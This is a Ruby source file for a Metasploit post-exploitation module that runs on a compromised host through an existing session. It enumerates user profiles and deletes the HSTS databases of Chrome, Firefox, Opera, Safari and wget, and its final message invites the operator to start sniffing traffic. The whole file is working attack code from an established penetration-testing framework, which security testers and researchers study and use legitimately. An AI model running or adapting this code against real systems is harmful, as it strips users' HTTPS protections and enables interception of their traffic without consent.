metasploit-framework/modules/post/multi/manage/hsts_eraser.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::OSX::System
  include Msf::Post::Unix

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Web browsers HSTS entries eraser',
      'Description' => %q{
        This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,
        Google Chrome, Opera, Safari and wget.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Sheila A. Berta (UnaPibaGeek)', # ElevenPaths
        ],
      'Platform'     => %w(linux osx unix win),
      'Arch'         => [ARCH_X86,ARCH_X64],
      'References'   =>
        [
          [ 'URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ],
          [ 'URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ]
        ],
      'SessionTypes' => %w(meterpreter shell)
    ))

    register_options([
        OptBool.new('DISCLAIMER',
            [true, 'This module will delete HSTS data from the target. Set this parameter to True in order to accept this warning.', false])
      ])
  end

  def run
    unless (datastore['DISCLAIMER'] == true)
        print_error("This module will delete HSTS data from all browsers on the target. You must set the DISCLAIMER option to True to acknowledge that you understand this warning.")
        return
    end

    profiles = user_profiles

    profiles.each do |user_profile|
      account = user_profile['UserName']
      browsers_hsts_db_path = {}

      case session.platform
      when 'windows'
        browsers_hsts_db_path = {
          'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\TransportSecurity",
          'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", #Just path for now
          'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\TransportSecurity"
        }
      when 'unix', 'linux'
        browsers_hsts_db_path = {
          'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/TransportSecurity",
          'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", #Just path for now
          'Opera' => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity",
          'wget' => "#{user_profile['LocalAppData']}/.wget-hsts"
        }
      when 'osx'
        browsers_hsts_db_path = {
          'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/TransportSecurity",
          'Firefox' => "#{user_profile['LocalAppData']}/Firefox/Profiles", #Just path for now
          'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/TransportSecurity",
          'Safari' => "#{user_profile['AppData']}/Cookies/HSTS.plist"
        }
      else
        print_error "Platform not recognized: #{session.platform}"
      end

      browsers_hsts_db_path.each_pair do |browser, path|
        if browser == 'Firefox'
          hsts_db_path = []
          if directory?(path)
            files = dir(path)
            files.reject! { |file| %w(. ..).include?(file) }
            files.each do |file_path|
              hsts_db_path.push([path, file_path, 'SiteSecurityServiceState.txt'].join(system_separator)) if file_path.match(/.*\.default/)
            end
          end
          path = hsts_db_path[0]
        end
        if !path.nil? and file?(path)
          print_status "Removing #{browser} HSTS database for #{account}... "
          file_rm(path)
        end
      end
    end

    print_status "HSTS databases removed! Now enjoy your favorite sniffer! ;-)"

  end

  def user_profiles
    user_profiles = []
    case session.platform
    when /unix|linux/
      user_names = dir("/home")
      user_names.reject! { |u| %w(. ..).include?(u) }
      user_names.each do |user_name|
        user_profiles.push('UserName' => user_name, "LocalAppData" => "/home/#{user_name}")
      end
    when /osx/
      user_names = session.shell_command("ls /Users").split
      user_names.reject! { |u| u == 'Shared' }
      user_names.each do |user_name|
        user_profiles.push(
          'UserName' => user_name,
          "AppData" => "/Users/#{user_name}/Library",
          "LocalAppData" => "/Users/#{user_name}/Library/Application Support"
        )
      end
    when /windows/
      user_profiles |= grab_user_profiles
    else
      print_error "Error getting user profile data!"
    end
    user_profiles
  end

  def system_separator
    return session.platform == 'windows' ? '\\' : '/'
  end
end